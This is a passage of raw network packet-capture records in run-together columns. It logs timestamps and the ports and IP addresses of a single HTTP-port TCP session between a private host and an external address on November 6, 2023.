                                                                                                                                                                      Nov 6, 2023 15:35:08.737240076 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737546921 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737560987 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737572908 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737571955 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.737586021 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737597942 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737770081 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.737809896 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.737987041 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.739263058 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.739447117 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.741313934 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.741460085 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.741668940 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.741712093 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.741741896 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.741795063 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.743050098 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.743237019 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.743793011 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.743932009 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.745393991 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745471001 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.745606899 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745620966 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745657921 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745670080 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745723963 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.745805025 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:08.745806932 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:08.745939016 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.071794033 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.071866989 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.071902990 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072000027 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072525978 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072540998 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072572947 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072580099 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072587013 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072599888 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072612047 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072690010 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072755098 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072848082 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.072889090 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.072988987 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.075257063 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.075280905 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.075293064 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.075305939 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.075371027 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.075428009 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.078706980 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.078823090 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.079674959 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.079737902 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.079742908 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.079832077 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.080451965 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.080550909 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.081638098 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.081650972 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.081712008 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.082175970 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.082261086 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.082648039 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.082729101 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.082803965 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.082864046 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.083029985 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.083095074 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.083288908 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.083374023 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.084424973 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.084521055 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.085159063 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.085269928 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.085773945 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.085848093 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.086430073 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.086566925 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.088011026 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.088090897 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.088424921 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.088527918 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.090764046 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.090821028 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.090831041 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.090843916 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.090854883 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.090912104 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.091022015 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.091077089 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.092241049 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.092333078 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.093300104 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.093364000 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.094525099 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.094578981 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.095082045 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.095166922 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.095907927 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.095978975 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.096287012 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.096364021 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.097753048 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.097831964 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.099081993 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.099097013 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.099190950 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.101035118 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.101099014 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.102233887 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.102313995 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.103566885 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.103662968 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.104485989 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.104501009 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.104582071 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.105094910 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.105180979 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.105648994 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.105745077 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.107569933 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.107651949 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.411938906 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.412102938 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.412455082 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.412568092 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.413297892 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.413376093 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.414043903 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.414130926 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.415164948 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.415249109 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.416542053 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.416637897 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.418081999 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.418150902 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.418322086 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.418381929 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.418636084 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.418711901 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.419481993 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.419579983 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.420720100 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.420808077 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.421552896 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.421606064 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.422046900 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.422151089 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.423269987 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.423325062 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.423652887 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.423712015 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.423722029 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.423782110 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.424329996 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.424432993 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.425451040 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.425543070 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.426132917 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.426220894 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.427544117 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.427629948 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.427861929 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.427948952 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.428864956 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.428936005 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.429532051 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.429593086 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.429802895 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.429855108 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.430294991 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.430350065 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.430619955 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.430701017 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.431200027 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.431282043 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.432523012 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.432612896 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.432811022 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.432883978 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.433471918 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.433525085 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.433702946 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.433774948 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.434360027 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.434446096 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.436141968 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.436156034 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.436259031 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.436959982 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.437057972 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.437134981 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.437223911 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.438209057 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.438302040 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.439498901 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.439594984 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.440646887 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.440720081 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.441163063 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.441250086 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.441685915 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.441778898 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.442720890 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.442754984 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.442800045 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.442823887 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.443036079 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.443123102 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.443893909 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.443998098 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.445291042 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.445399046 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.446522951 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.446639061 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.448133945 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.448265076 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.449520111 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.449635029 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.451133013 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.451204062 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.451416969 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.451492071 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.451951981 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.452040911 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.452542067 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.452625990 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.453421116 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.453471899 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.453484058 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.453532934 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.453855038 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.453912020 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.454022884 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.454133987 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.456214905 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.456291914 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.456509113 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.456599951 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.457571983 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.457652092 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.458154917 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.458264112 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.459352970 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.459448099 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.460500002 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.460593939 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.461740017 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.461807966 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.461940050 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.462018013 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.462732077 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.462795019 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.462858915 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.462935925 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.463438034 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.463526964 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.465362072 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.465462923 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.467183113 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.467262030 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.467587948 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.467647076 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.468096018 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.468182087 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.468831062 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.468941927 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.470822096 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.470920086 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.472358942 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.472433090 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.472851038 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.472918987 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.473119974 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.473208904 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.474646091 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.474731922 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.475769997 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.475867987 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.477936029 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.478012085 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.752366066 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.752393961 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.752813101 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.753505945 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.753599882 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.753786087 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:09.753844023 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:09.753899097 CET8049708193.37.71.112192.168.2.8
